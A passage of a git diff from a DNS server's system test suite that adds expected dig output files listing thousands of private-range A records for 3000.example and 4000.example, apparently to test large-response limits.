10.0.9.61 +3000.example. 5M IN A 10.0.9.62 +3000.example. 5M IN A 10.0.9.63 +3000.example. 5M IN A 10.0.9.64 +3000.example. 5M IN A 10.0.9.65 +3000.example. 5M IN A 10.0.9.66 +3000.example. 5M IN A 10.0.9.67 +3000.example. 5M IN A 10.0.9.68 +3000.example. 5M IN A 10.0.9.69 +3000.example. 5M IN A 10.0.9.70 +3000.example. 5M IN A 10.0.9.71 +3000.example. 5M IN A 10.0.9.72 +3000.example. 5M IN A 10.0.9.73 +3000.example. 5M IN A 10.0.9.74 +3000.example. 5M IN A 10.0.9.75 +3000.example. 5M IN A 10.0.9.76 +3000.example. 5M IN A 10.0.9.77 +3000.example. 5M IN A 10.0.9.78 +3000.example. 5M IN A 10.0.9.79 +3000.example. 5M IN A 10.0.9.80 +3000.example. 5M IN A 10.0.9.81 +3000.example. 5M IN A 10.0.9.82 +3000.example. 5M IN A 10.0.9.83 +3000.example. 5M IN A 10.0.9.84 +3000.example. 5M IN A 10.0.9.85 +3000.example. 5M IN A 10.0.9.86 +3000.example. 5M IN A 10.0.9.87 +3000.example. 5M IN A 10.0.9.88 +3000.example. 5M IN A 10.0.9.89 +3000.example. 5M IN A 10.0.9.90 +3000.example. 5M IN A 10.0.9.91 +3000.example. 5M IN A 10.0.9.92 +3000.example. 5M IN A 10.0.9.93 +3000.example. 5M IN A 10.0.9.94 +3000.example. 5M IN A 10.0.9.95 +3000.example. 5M IN A 10.0.9.96 +3000.example. 5M IN A 10.0.9.97 +3000.example. 5M IN A 10.0.9.98 +3000.example. 5M IN A 10.0.9.99 +3000.example. 5M IN A 10.0.9.100 +3000.example. 5M IN A 10.0.9.101 +3000.example. 5M IN A 10.0.9.102 +3000.example. 5M IN A 10.0.9.103 +3000.example. 5M IN A 10.0.9.104 +3000.example. 5M IN A 10.0.9.105 +3000.example. 5M IN A 10.0.9.106 +3000.example. 5M IN A 10.0.9.107 +3000.example. 5M IN A 10.0.9.108 +3000.example. 5M IN A 10.0.9.109 +3000.example. 5M IN A 10.0.9.110 +3000.example. 5M IN A 10.0.9.111 +3000.example. 5M IN A 10.0.9.112 +3000.example. 5M IN A 10.0.9.113 +3000.example. 5M IN A 10.0.9.114 +3000.example. 5M IN A 10.0.9.115 +3000.example. 5M IN A 10.0.9.116 +3000.example. 5M IN A 10.0.9.117 +3000.example. 5M IN A 10.0.9.118 +3000.example. 5M IN A 10.0.9.119 +3000.example. 5M IN A 10.0.9.120 +3000.example. 5M IN A 10.0.9.121 +3000.example. 5M IN A 10.0.9.122 +3000.example. 5M IN A 10.0.9.123 +3000.example. 5M IN A 10.0.9.124 +3000.example. 5M IN A 10.0.9.125 +3000.example. 5M IN A 10.0.9.126 +3000.example. 5M IN A 10.0.9.127 +3000.example. 5M IN A 10.0.9.128 +3000.example. 5M IN A 10.0.9.129 +3000.example. 5M IN A 10.0.9.130 +3000.example. 5M IN A 10.0.9.131 +3000.example. 5M IN A 10.0.9.132 +3000.example. 5M IN A 10.0.9.133 +3000.example. 5M IN A 10.0.9.134 +3000.example. 5M IN A 10.0.9.135 +3000.example. 5M IN A 10.0.9.136 +3000.example. 5M IN A 10.0.9.137 +3000.example. 5M IN A 10.0.9.138 +3000.example. 5M IN A 10.0.9.139 +3000.example. 5M IN A 10.0.9.140 +3000.example. 5M IN A 10.0.9.141 +3000.example. 5M IN A 10.0.9.142 +3000.example. 5M IN A 10.0.9.143 +3000.example. 5M IN A 10.0.9.144 +3000.example. 5M IN A 10.0.9.145 +3000.example. 5M IN A 10.0.9.146 +3000.example. 5M IN A 10.0.9.147 +3000.example. 5M IN A 10.0.9.148 +3000.example. 5M IN A 10.0.9.149 +3000.example. 5M IN A 10.0.9.150 +3000.example. 5M IN A 10.0.9.151 +3000.example. 5M IN A 10.0.9.152 +3000.example. 5M IN A 10.0.9.153 +3000.example. 5M IN A 10.0.9.154 +3000.example. 5M IN A 10.0.9.155 +3000.example. 5M IN A 10.0.9.156 +3000.example. 5M IN A 10.0.9.157 +3000.example. 5M IN A 10.0.9.158 +3000.example. 5M IN A 10.0.9.159 +3000.example. 5M IN A 10.0.9.160 +3000.example. 5M IN A 10.0.9.161 +3000.example. 5M IN A 10.0.9.162 +3000.example. 5M IN A 10.0.9.163 +3000.example. 5M IN A 10.0.9.164 +3000.example. 5M IN A 10.0.9.165 +3000.example. 5M IN A 10.0.9.166 +3000.example. 5M IN A 10.0.9.167 +3000.example. 5M IN A 10.0.9.168 +3000.example. 5M IN A 10.0.9.169 +3000.example. 5M IN A 10.0.9.170 +3000.example. 5M IN A 10.0.9.171 +3000.example. 5M IN A 10.0.9.172 +3000.example. 5M IN A 10.0.9.173 +3000.example. 5M IN A 10.0.9.174 +3000.example. 5M IN A 10.0.9.175 +3000.example. 5M IN A 10.0.9.176 +3000.example. 5M IN A 10.0.9.177 +3000.example. 5M IN A 10.0.9.178 +3000.example. 5M IN A 10.0.9.179 +3000.example. 5M IN A 10.0.9.180 +3000.example. 5M IN A 10.0.9.181 +3000.example. 5M IN A 10.0.9.182 +3000.example. 5M IN A 10.0.9.183 +3000.example. 5M IN A 10.0.9.184 +3000.example. 5M IN A 10.0.9.185 +3000.example. 5M IN A 10.0.9.186 +3000.example. 5M IN A 10.0.9.187 +3000.example. 5M IN A 10.0.9.188 +3000.example. 5M IN A 10.0.9.189 +3000.example. 5M IN A 10.0.9.190 +3000.example. 5M IN A 10.0.9.191 +3000.example. 5M IN A 10.0.9.192 +3000.example. 5M IN A 10.0.9.193 +3000.example. 5M IN A 10.0.9.194 +3000.example. 5M IN A 10.0.9.195 +3000.example. 5M IN A 10.0.9.196 +3000.example. 5M IN A 10.0.9.197 +3000.example. 5M IN A 10.0.9.198 +3000.example. 5M IN A 10.0.9.199 +3000.example. 5M IN A 10.0.9.200 +3000.example. 5M IN A 10.0.9.201 +3000.example. 5M IN A 10.0.9.202 +3000.example. 5M IN A 10.0.9.203 +3000.example. 5M IN A 10.0.9.204 +3000.example. 5M IN A 10.0.9.205 +3000.example. 5M IN A 10.0.9.206 +3000.example. 5M IN A 10.0.9.207 +3000.example. 5M IN A 10.0.9.208 +3000.example. 5M IN A 10.0.9.209 +3000.example. 5M IN A 10.0.9.210 +3000.example. 5M IN A 10.0.9.211 +3000.example. 5M IN A 10.0.9.212 +3000.example. 5M IN A 10.0.9.213 +3000.example. 5M IN A 10.0.9.214 +3000.example. 5M IN A 10.0.9.215 +3000.example. 5M IN A 10.0.9.216 +3000.example. 5M IN A 10.0.9.217 +3000.example. 5M IN A 10.0.9.218 +3000.example. 5M IN A 10.0.9.219 +3000.example. 5M IN A 10.0.9.220 +3000.example. 5M IN A 10.0.9.221 +3000.example. 5M IN A 10.0.9.222 +3000.example. 5M IN A 10.0.9.223 +3000.example. 5M IN A 10.0.9.224 +3000.example. 5M IN A 10.0.9.225 +3000.example. 5M IN A 10.0.9.226 +3000.example. 5M IN A 10.0.9.227 +3000.example. 5M IN A 10.0.9.228 +3000.example. 5M IN A 10.0.9.229 +3000.example. 5M IN A 10.0.9.230 +3000.example. 5M IN A 10.0.9.231 +3000.example. 5M IN A 10.0.9.232 +3000.example. 5M IN A 10.0.9.233 +3000.example. 5M IN A 10.0.9.234 +3000.example. 5M IN A 10.0.9.235 +3000.example. 5M IN A 10.0.9.236 +3000.example. 5M IN A 10.0.9.237 +3000.example. 5M IN A 10.0.9.238 +3000.example. 5M IN A 10.0.9.239 +3000.example. 5M IN A 10.0.9.240 +3000.example. 5M IN A 10.0.9.241 +3000.example. 5M IN A 10.0.9.242 +3000.example. 5M IN A 10.0.9.243 +3000.example. 5M IN A 10.0.9.244 +3000.example. 5M IN A 10.0.9.245 +3000.example. 5M IN A 10.0.9.246 +3000.example. 5M IN A 10.0.9.247 +3000.example. 5M IN A 10.0.9.248 +3000.example. 5M IN A 10.0.9.249 +3000.example. 5M IN A 10.0.9.250 +3000.example. 5M IN A 10.0.9.251 +3000.example. 5M IN A 10.0.9.252 +3000.example. 5M IN A 10.0.9.253 +3000.example. 5M IN A 10.0.9.254 +3000.example. 5M IN A 10.0.9.255 +3000.example. 5M IN A 10.0.10.0 +3000.example. 5M IN A 10.0.10.1 +3000.example. 5M IN A 10.0.10.2 +3000.example. 5M IN A 10.0.10.3 +3000.example. 5M IN A 10.0.10.4 +3000.example. 5M IN A 10.0.10.5 +3000.example. 5M IN A 10.0.10.6 +3000.example. 5M IN A 10.0.10.7 +3000.example. 5M IN A 10.0.10.8 +3000.example. 5M IN A 10.0.10.9 +3000.example. 5M IN A 10.0.10.10 +3000.example. 5M IN A 10.0.10.11 +3000.example. 5M IN A 10.0.10.12 +3000.example. 5M IN A 10.0.10.13 +3000.example. 5M IN A 10.0.10.14 +3000.example. 5M IN A 10.0.10.15 +3000.example. 5M IN A 10.0.10.16 +3000.example. 5M IN A 10.0.10.17 +3000.example. 5M IN A 10.0.10.18 +3000.example. 5M IN A 10.0.10.19 +3000.example. 5M IN A 10.0.10.20 +3000.example. 5M IN A 10.0.10.21 +3000.example. 5M IN A 10.0.10.22 +3000.example. 5M IN A 10.0.10.23 +3000.example. 5M IN A 10.0.10.24 +3000.example. 5M IN A 10.0.10.25 +3000.example. 5M IN A 10.0.10.26 +3000.example. 5M IN A 10.0.10.27 +3000.example. 5M IN A 10.0.10.28 +3000.example. 5M IN A 10.0.10.29 +3000.example. 5M IN A 10.0.10.30 +3000.example. 5M IN A 10.0.10.31 +3000.example. 5M IN A 10.0.10.32 +3000.example. 5M IN A 10.0.10.33 +3000.example. 5M IN A 10.0.10.34 +3000.example. 5M IN A 10.0.10.35 +3000.example. 5M IN A 10.0.10.36 +3000.example. 5M IN A 10.0.10.37 +3000.example. 5M IN A 10.0.10.38 +3000.example. 5M IN A 10.0.10.39 +3000.example. 5M IN A 10.0.10.40 +3000.example. 5M IN A 10.0.10.41 +3000.example. 5M IN A 10.0.10.42 +3000.example. 5M IN A 10.0.10.43 +3000.example. 5M IN A 10.0.10.44 +3000.example. 5M IN A 10.0.10.45 +3000.example. 5M IN A 10.0.10.46 +3000.example. 5M IN A 10.0.10.47 +3000.example. 5M IN A 10.0.10.48 +3000.example. 5M IN A 10.0.10.49 +3000.example. 5M IN A 10.0.10.50 +3000.example. 5M IN A 10.0.10.51 +3000.example. 5M IN A 10.0.10.52 +3000.example. 5M IN A 10.0.10.53 +3000.example. 5M IN A 10.0.10.54 +3000.example. 5M IN A 10.0.10.55 +3000.example. 5M IN A 10.0.10.56 +3000.example. 5M IN A 10.0.10.57 +3000.example. 5M IN A 10.0.10.58 +3000.example. 5M IN A 10.0.10.59 +3000.example. 5M IN A 10.0.10.60 +3000.example. 5M IN A 10.0.10.61 +3000.example. 5M IN A 10.0.10.62 +3000.example. 5M IN A 10.0.10.63 +3000.example. 5M IN A 10.0.10.64 +3000.example. 5M IN A 10.0.10.65 +3000.example. 5M IN A 10.0.10.66 +3000.example. 5M IN A 10.0.10.67 +3000.example. 5M IN A 10.0.10.68 +3000.example. 5M IN A 10.0.10.69 +3000.example. 5M IN A 10.0.10.70 +3000.example. 5M IN A 10.0.10.71 +3000.example. 5M IN A 10.0.10.72 +3000.example. 5M IN A 10.0.10.73 +3000.example. 5M IN A 10.0.10.74 +3000.example. 5M IN A 10.0.10.75 +3000.example. 5M IN A 10.0.10.76 +3000.example. 5M IN A 10.0.10.77 +3000.example. 5M IN A 10.0.10.78 +3000.example. 5M IN A 10.0.10.79 +3000.example. 5M IN A 10.0.10.80 +3000.example. 5M IN A 10.0.10.81 +3000.example. 5M IN A 10.0.10.82 +3000.example. 5M IN A 10.0.10.83 +3000.example. 5M IN A 10.0.10.84 +3000.example. 5M IN A 10.0.10.85 +3000.example. 5M IN A 10.0.10.86 +3000.example. 5M IN A 10.0.10.87 +3000.example. 5M IN A 10.0.10.88 +3000.example. 5M IN A 10.0.10.89 +3000.example. 5M IN A 10.0.10.90 +3000.example. 5M IN A 10.0.10.91 +3000.example. 5M IN A 10.0.10.92 +3000.example. 5M IN A 10.0.10.93 +3000.example. 5M IN A 10.0.10.94 +3000.example. 5M IN A 10.0.10.95 +3000.example. 5M IN A 10.0.10.96 +3000.example. 5M IN A 10.0.10.97 +3000.example. 5M IN A 10.0.10.98 +3000.example. 5M IN A 10.0.10.99 +3000.example. 5M IN A 10.0.10.100 +3000.example. 5M IN A 10.0.10.101 +3000.example. 5M IN A 10.0.10.102 +3000.example. 5M IN A 10.0.10.103 +3000.example. 5M IN A 10.0.10.104 +3000.example. 5M IN A 10.0.10.105 +3000.example. 5M IN A 10.0.10.106 +3000.example. 5M IN A 10.0.10.107 +3000.example. 5M IN A 10.0.10.108 +3000.example. 5M IN A 10.0.10.109 +3000.example. 5M IN A 10.0.10.110 +3000.example. 5M IN A 10.0.10.111 +3000.example. 5M IN A 10.0.10.112 +3000.example. 5M IN A 10.0.10.113 +3000.example. 5M IN A 10.0.10.114 +3000.example. 5M IN A 10.0.10.115 +3000.example. 5M IN A 10.0.10.116 +3000.example. 5M IN A 10.0.10.117 +3000.example. 5M IN A 10.0.10.118 +3000.example. 5M IN A 10.0.10.119 +3000.example. 5M IN A 10.0.10.120 +3000.example. 5M IN A 10.0.10.121 +3000.example. 5M IN A 10.0.10.122 +3000.example. 5M IN A 10.0.10.123 +3000.example. 5M IN A 10.0.10.124 +3000.example. 5M IN A 10.0.10.125 +3000.example. 5M IN A 10.0.10.126 +3000.example. 5M IN A 10.0.10.127 +3000.example. 5M IN A 10.0.10.128 +3000.example. 5M IN A 10.0.10.129 +3000.example. 5M IN A 10.0.10.130 +3000.example. 5M IN A 10.0.10.131 +3000.example. 5M IN A 10.0.10.132 +3000.example. 5M IN A 10.0.10.133 +3000.example. 5M IN A 10.0.10.134 +3000.example. 5M IN A 10.0.10.135 +3000.example. 5M IN A 10.0.10.136 +3000.example. 5M IN A 10.0.10.137 +3000.example. 5M IN A 10.0.10.138 +3000.example. 5M IN A 10.0.10.139 +3000.example. 5M IN A 10.0.10.140 +3000.example. 5M IN A 10.0.10.141 +3000.example. 5M IN A 10.0.10.142 +3000.example. 5M IN A 10.0.10.143 +3000.example. 5M IN A 10.0.10.144 +3000.example. 5M IN A 10.0.10.145 +3000.example. 5M IN A 10.0.10.146 +3000.example. 5M IN A 10.0.10.147 +3000.example. 5M IN A 10.0.10.148 +3000.example. 5M IN A 10.0.10.149 +3000.example. 5M IN A 10.0.10.150 +3000.example. 5M IN A 10.0.10.151 +3000.example. 5M IN A 10.0.10.152 +3000.example. 5M IN A 10.0.10.153 +3000.example. 5M IN A 10.0.10.154 +3000.example. 5M IN A 10.0.10.155 +3000.example. 5M IN A 10.0.10.156 +3000.example. 5M IN A 10.0.10.157 +3000.example. 5M IN A 10.0.10.158 +3000.example. 5M IN A 10.0.10.159 +3000.example. 5M IN A 10.0.10.160 +3000.example. 5M IN A 10.0.10.161 +3000.example. 5M IN A 10.0.10.162 +3000.example. 5M IN A 10.0.10.163 +3000.example. 5M IN A 10.0.10.164 +3000.example. 5M IN A 10.0.10.165 +3000.example. 5M IN A 10.0.10.166 +3000.example. 5M IN A 10.0.10.167 +3000.example. 5M IN A 10.0.10.168 +3000.example. 5M IN A 10.0.10.169 +3000.example. 5M IN A 10.0.10.170 +3000.example. 5M IN A 10.0.10.171 +3000.example. 5M IN A 10.0.10.172 +3000.example. 5M IN A 10.0.10.173 +3000.example. 5M IN A 10.0.10.174 +3000.example. 5M IN A 10.0.10.175 +3000.example. 5M IN A 10.0.10.176 +3000.example. 5M IN A 10.0.10.177 +3000.example. 5M IN A 10.0.10.178 +3000.example. 5M IN A 10.0.10.179 +3000.example. 5M IN A 10.0.10.180 +3000.example. 5M IN A 10.0.10.181 +3000.example. 5M IN A 10.0.10.182 +3000.example. 5M IN A 10.0.10.183 +3000.example. 5M IN A 10.0.10.184 +3000.example. 5M IN A 10.0.10.185 +3000.example. 5M IN A 10.0.10.186 +3000.example. 5M IN A 10.0.10.187 +3000.example. 5M IN A 10.0.10.188 +3000.example. 5M IN A 10.0.10.189 +3000.example. 5M IN A 10.0.10.190 +3000.example. 5M IN A 10.0.10.191 +3000.example. 5M IN A 10.0.10.192 +3000.example. 5M IN A 10.0.10.193 +3000.example. 5M IN A 10.0.10.194 +3000.example. 5M IN A 10.0.10.195 +3000.example. 5M IN A 10.0.10.196 +3000.example. 5M IN A 10.0.10.197 +3000.example. 5M IN A 10.0.10.198 +3000.example. 5M IN A 10.0.10.199 +3000.example. 5M IN A 10.0.10.200 +3000.example. 5M IN A 10.0.10.201 +3000.example. 5M IN A 10.0.10.202 +3000.example. 5M IN A 10.0.10.203 +3000.example. 5M IN A 10.0.10.204 +3000.example. 5M IN A 10.0.10.205 +3000.example. 5M IN A 10.0.10.206 +3000.example. 5M IN A 10.0.10.207 +3000.example. 5M IN A 10.0.10.208 +3000.example. 5M IN A 10.0.10.209 +3000.example. 5M IN A 10.0.10.210 +3000.example. 5M IN A 10.0.10.211 +3000.example. 5M IN A 10.0.10.212 +3000.example. 5M IN A 10.0.10.213 +3000.example. 5M IN A 10.0.10.214 +3000.example. 5M IN A 10.0.10.215 +3000.example. 5M IN A 10.0.10.216 +3000.example. 5M IN A 10.0.10.217 +3000.example. 5M IN A 10.0.10.218 +3000.example. 5M IN A 10.0.10.219 +3000.example. 5M IN A 10.0.10.220 +3000.example. 5M IN A 10.0.10.221 +3000.example. 5M IN A 10.0.10.222 +3000.example. 5M IN A 10.0.10.223 +3000.example. 5M IN A 10.0.10.224 +3000.example. 5M IN A 10.0.10.225 +3000.example. 5M IN A 10.0.10.226 +3000.example. 5M IN A 10.0.10.227 +3000.example. 5M IN A 10.0.10.228 +3000.example. 5M IN A 10.0.10.229 +3000.example. 5M IN A 10.0.10.230 +3000.example. 5M IN A 10.0.10.231 +3000.example. 5M IN A 10.0.10.232 +3000.example. 5M IN A 10.0.10.233 +3000.example. 5M IN A 10.0.10.234 +3000.example. 5M IN A 10.0.10.235 +3000.example. 5M IN A 10.0.10.236 +3000.example. 5M IN A 10.0.10.237 +3000.example. 5M IN A 10.0.10.238 +3000.example. 5M IN A 10.0.10.239 +3000.example. 5M IN A 10.0.10.240 +3000.example. 5M IN A 10.0.10.241 +3000.example. 5M IN A 10.0.10.242 +3000.example. 5M IN A 10.0.10.243 +3000.example. 5M IN A 10.0.10.244 +3000.example. 5M IN A 10.0.10.245 +3000.example. 5M IN A 10.0.10.246 +3000.example. 5M IN A 10.0.10.247 +3000.example. 5M IN A 10.0.10.248 +3000.example. 5M IN A 10.0.10.249 +3000.example. 5M IN A 10.0.10.250 +3000.example. 5M IN A 10.0.10.251 +3000.example. 5M IN A 10.0.10.252 +3000.example. 5M IN A 10.0.10.253 +3000.example. 5M IN A 10.0.10.254 +3000.example. 5M IN A 10.0.10.255 +3000.example. 5M IN A 10.0.11.0 +3000.example. 5M IN A 10.0.11.1 +3000.example. 5M IN A 10.0.11.2 +3000.example. 5M IN A 10.0.11.3 +3000.example. 5M IN A 10.0.11.4 +3000.example. 5M IN A 10.0.11.5 +3000.example. 5M IN A 10.0.11.6 +3000.example. 5M IN A 10.0.11.7 +3000.example. 5M IN A 10.0.11.8 +3000.example. 5M IN A 10.0.11.9 +3000.example. 5M IN A 10.0.11.10 +3000.example. 5M IN A 10.0.11.11 +3000.example. 5M IN A 10.0.11.12 +3000.example. 5M IN A 10.0.11.13 +3000.example. 5M IN A 10.0.11.14 +3000.example. 5M IN A 10.0.11.15 +3000.example. 5M IN A 10.0.11.16 +3000.example. 5M IN A 10.0.11.17 +3000.example. 5M IN A 10.0.11.18 +3000.example. 5M IN A 10.0.11.19 +3000.example. 5M IN A 10.0.11.20 +3000.example. 5M IN A 10.0.11.21 +3000.example. 5M IN A 10.0.11.22 +3000.example. 5M IN A 10.0.11.23 +3000.example. 5M IN A 10.0.11.24 +3000.example. 5M IN A 10.0.11.25 +3000.example. 5M IN A 10.0.11.26 +3000.example. 5M IN A 10.0.11.27 +3000.example. 5M IN A 10.0.11.28 +3000.example. 5M IN A 10.0.11.29 +3000.example. 5M IN A 10.0.11.30 +3000.example. 5M IN A 10.0.11.31 +3000.example. 5M IN A 10.0.11.32 +3000.example. 5M IN A 10.0.11.33 +3000.example. 5M IN A 10.0.11.34 +3000.example. 5M IN A 10.0.11.35 +3000.example. 5M IN A 10.0.11.36 +3000.example. 5M IN A 10.0.11.37 +3000.example. 5M IN A 10.0.11.38 +3000.example. 5M IN A 10.0.11.39 +3000.example. 5M IN A 10.0.11.40 +3000.example. 5M IN A 10.0.11.41 +3000.example. 5M IN A 10.0.11.42 +3000.example. 5M IN A 10.0.11.43 +3000.example. 5M IN A 10.0.11.44 +3000.example. 5M IN A 10.0.11.45 +3000.example. 5M IN A 10.0.11.46 +3000.example. 5M IN A 10.0.11.47 +3000.example. 5M IN A 10.0.11.48 +3000.example. 5M IN A 10.0.11.49 +3000.example. 5M IN A 10.0.11.50 +3000.example. 5M IN A 10.0.11.51 +3000.example. 5M IN A 10.0.11.52 +3000.example. 5M IN A 10.0.11.53 +3000.example. 5M IN A 10.0.11.54 +3000.example. 5M IN A 10.0.11.55 +3000.example. 5M IN A 10.0.11.56 +3000.example. 5M IN A 10.0.11.57 +3000.example. 5M IN A 10.0.11.58 +3000.example. 5M IN A 10.0.11.59 +3000.example. 5M IN A 10.0.11.60 +3000.example. 5M IN A 10.0.11.61 +3000.example. 5M IN A 10.0.11.62 +3000.example. 5M IN A 10.0.11.63 +3000.example. 5M IN A 10.0.11.64 +3000.example. 5M IN A 10.0.11.65 +3000.example. 5M IN A 10.0.11.66 +3000.example. 5M IN A 10.0.11.67 +3000.example. 5M IN A 10.0.11.68 +3000.example. 5M IN A 10.0.11.69 +3000.example. 5M IN A 10.0.11.70 +3000.example. 5M IN A 10.0.11.71 +3000.example. 5M IN A 10.0.11.72 +3000.example. 5M IN A 10.0.11.73 +3000.example. 5M IN A 10.0.11.74 +3000.example. 5M IN A 10.0.11.75 +3000.example. 5M IN A 10.0.11.76 +3000.example. 5M IN A 10.0.11.77 +3000.example. 5M IN A 10.0.11.78 +3000.example. 5M IN A 10.0.11.79 +3000.example. 5M IN A 10.0.11.80 +3000.example. 5M IN A 10.0.11.81 +3000.example. 5M IN A 10.0.11.82 +3000.example. 5M IN A 10.0.11.83 +3000.example. 5M IN A 10.0.11.84 +3000.example. 5M IN A 10.0.11.85 +3000.example. 5M IN A 10.0.11.86 +3000.example. 5M IN A 10.0.11.87 +3000.example. 5M IN A 10.0.11.88 +3000.example. 5M IN A 10.0.11.89 +3000.example. 5M IN A 10.0.11.90 +3000.example. 5M IN A 10.0.11.91 +3000.example. 5M IN A 10.0.11.92 +3000.example. 5M IN A 10.0.11.93 +3000.example. 5M IN A 10.0.11.94 +3000.example. 5M IN A 10.0.11.95 +3000.example. 5M IN A 10.0.11.96 +3000.example. 5M IN A 10.0.11.97 +3000.example. 5M IN A 10.0.11.98 +3000.example. 5M IN A 10.0.11.99 +3000.example. 5M IN A 10.0.11.100 +3000.example. 5M IN A 10.0.11.101 +3000.example. 5M IN A 10.0.11.102 +3000.example. 5M IN A 10.0.11.103 +3000.example. 5M IN A 10.0.11.104 +3000.example. 5M IN A 10.0.11.105 +3000.example. 5M IN A 10.0.11.106 +3000.example. 5M IN A 10.0.11.107 +3000.example. 5M IN A 10.0.11.108 +3000.example. 5M IN A 10.0.11.109 +3000.example. 5M IN A 10.0.11.110 +3000.example. 5M IN A 10.0.11.111 +3000.example. 5M IN A 10.0.11.112 +3000.example. 5M IN A 10.0.11.113 +3000.example. 5M IN A 10.0.11.114 +3000.example. 5M IN A 10.0.11.115 +3000.example. 5M IN A 10.0.11.116 +3000.example. 5M IN A 10.0.11.117 +3000.example. 5M IN A 10.0.11.118 +3000.example. 5M IN A 10.0.11.119 +3000.example. 5M IN A 10.0.11.120 +3000.example. 5M IN A 10.0.11.121 +3000.example. 5M IN A 10.0.11.122 +3000.example. 5M IN A 10.0.11.123 +3000.example. 5M IN A 10.0.11.124 +3000.example. 5M IN A 10.0.11.125 +3000.example. 5M IN A 10.0.11.126 +3000.example. 5M IN A 10.0.11.127 +3000.example. 5M IN A 10.0.11.128 +3000.example. 5M IN A 10.0.11.129 +3000.example. 5M IN A 10.0.11.130 +3000.example. 5M IN A 10.0.11.131 +3000.example. 5M IN A 10.0.11.132 +3000.example. 5M IN A 10.0.11.133 +3000.example. 5M IN A 10.0.11.134 +3000.example. 5M IN A 10.0.11.135 +3000.example. 5M IN A 10.0.11.136 +3000.example. 5M IN A 10.0.11.137 +3000.example. 5M IN A 10.0.11.138 +3000.example. 5M IN A 10.0.11.139 +3000.example. 5M IN A 10.0.11.140 +3000.example. 5M IN A 10.0.11.141 +3000.example. 5M IN A 10.0.11.142 +3000.example. 5M IN A 10.0.11.143 +3000.example. 5M IN A 10.0.11.144 +3000.example. 5M IN A 10.0.11.145 +3000.example. 5M IN A 10.0.11.146 +3000.example. 5M IN A 10.0.11.147 +3000.example. 5M IN A 10.0.11.148 +3000.example. 5M IN A 10.0.11.149 +3000.example. 5M IN A 10.0.11.150 +3000.example. 5M IN A 10.0.11.151 +3000.example. 5M IN A 10.0.11.152 +3000.example. 5M IN A 10.0.11.153 +3000.example. 5M IN A 10.0.11.154 +3000.example. 5M IN A 10.0.11.155 +3000.example. 5M IN A 10.0.11.156 +3000.example. 5M IN A 10.0.11.157 +3000.example. 5M IN A 10.0.11.158 +3000.example. 5M IN A 10.0.11.159 +3000.example. 5M IN A 10.0.11.160 +3000.example. 5M IN A 10.0.11.161 +3000.example. 5M IN A 10.0.11.162 +3000.example. 5M IN A 10.0.11.163 +3000.example. 5M IN A 10.0.11.164 +3000.example. 5M IN A 10.0.11.165 +3000.example. 5M IN A 10.0.11.166 +3000.example. 5M IN A 10.0.11.167 +3000.example. 5M IN A 10.0.11.168 +3000.example. 5M IN A 10.0.11.169 +3000.example. 5M IN A 10.0.11.170 +3000.example. 5M IN A 10.0.11.171 +3000.example. 5M IN A 10.0.11.172 +3000.example. 5M IN A 10.0.11.173 +3000.example. 5M IN A 10.0.11.174 +3000.example. 5M IN A 10.0.11.175 +3000.example. 5M IN A 10.0.11.176 +3000.example. 5M IN A 10.0.11.177 +3000.example. 5M IN A 10.0.11.178 +3000.example. 5M IN A 10.0.11.179 +3000.example. 5M IN A 10.0.11.180 +3000.example. 5M IN A 10.0.11.181 +3000.example. 5M IN A 10.0.11.182 +3000.example. 5M IN A 10.0.11.183 + +;; AUTHORITY SECTION: +example. 5M IN NS ns1.example. + +;; ADDITIONAL SECTION: +ns1.example. 5M IN A 10.53.0.1 + +;; Total query time: 211 msec +;; FROM: draco to SERVER: 10.53.0.1 +;; WHEN: Fri Jun 23 12:58:17 2000 +;; MSG SIZE sent: 30 rcvd: 48068 + diff --git a/bin/tests/system/limits/knowngood.dig.out.4000 b/bin/tests/system/limits/knowngood.dig.out.4000 new file mode 100644 index 0000000..8b109c8 --- /dev/null +++ b/bin/tests/system/limits/knowngood.dig.out.4000 @@ -0,0 +1,4023 @@ + +; <<>> DiG 8.2 <<>> 4000.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 4000, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; 4000.example, type = A, class = IN + +;; ANSWER SECTION: +4000.example. 5M IN A 10.0.0.0 +4000.example. 5M IN A 10.0.0.1 +4000.example. 5M IN A 10.0.0.2 +4000.example. 5M IN A 10.0.0.3 +4000.example. 5M IN A 10.0.0.4 +4000.example. 5M IN A 10.0.0.5 +4000.example. 5M IN A 10.0.0.6 +4000.example. 5M IN A 10.0.0.7 +4000.example. 5M IN A 10.0.0.8 +4000.example. 5M IN A 10.0.0.9 +4000.example. 5M IN A 10.0.0.10 +4000.example. 5M IN A 10.0.0.11 +4000.example. 5M IN A 10.0.0.12 +4000.example. 5M IN A 10.0.0.13 +4000.example. 5M IN A 10.0.0.14 +4000.example. 5M IN A 10.0.0.15 +4000.example. 5M IN A 10.0.0.16 +4000.example. 5M IN A 10.0.0.17 +4000.example. 5M IN A 10.0.0.18 +4000.example. 5M IN A 10.0.0.19 +4000.example. 5M IN A 10.0.0.20 +4000.example. 5M IN A 10.0.0.21 +4000.example. 5M IN A 10.0.0.22 +4000.example. 5M IN A 10.0.0.23 +4000.example. 5M IN A 10.0.0.24 +4000.example. 5M IN A 10.0.0.25 +4000.example. 5M IN A 10.0.0.26 +4000.example. 5M IN A 10.0.0.27 +4000.example. 5M IN A 10.0.0.28 +4000.example. 5M IN A 10.0.0.29 +4000.example. 5M IN A 10.0.0.30 +4000.example. 5M IN A 10.0.0.31 +4000.example. 5M IN A 10.0.0.32 +4000.example. 5M IN A 10.0.0.33 +4000.example. 5M IN A 10.0.0.34 +4000.example. 5M IN A 10.0.0.35 +4000.example. 5M IN A 10.0.0.36 +4000.example. 5M IN A 10.0.0.37 +4000.example. 5M IN A 10.0.0.38 +4000.example. 5M IN A 10.0.0.39 +4000.example. 5M IN A 10.0.0.40 +4000.example. 5M IN A 10.0.0.41 +4000.example. 5M IN A 10.0.0.42 +4000.example. 5M IN A 10.0.0.43 +4000.example. 5M IN A 10.0.0.44 +4000.example. 5M IN A 10.0.0.45 +4000.example. 5M IN A 10.0.0.46 +4000.example. 5M IN A 10.0.0.47 +4000.example. 5M IN A 10.0.0.48 +4000.example. 5M IN A 10.0.0.49 +4000.example. 5M IN A 10.0.0.50 +4000.example. 5M IN A 10.0.0.51 +4000.example. 5M IN A 10.0.0.52 +4000.example. 5M IN A 10.0.0.53 +4000.example. 5M IN A 10.0.0.54 +4000.example. 5M IN A 10.0.0.55 +4000.example. 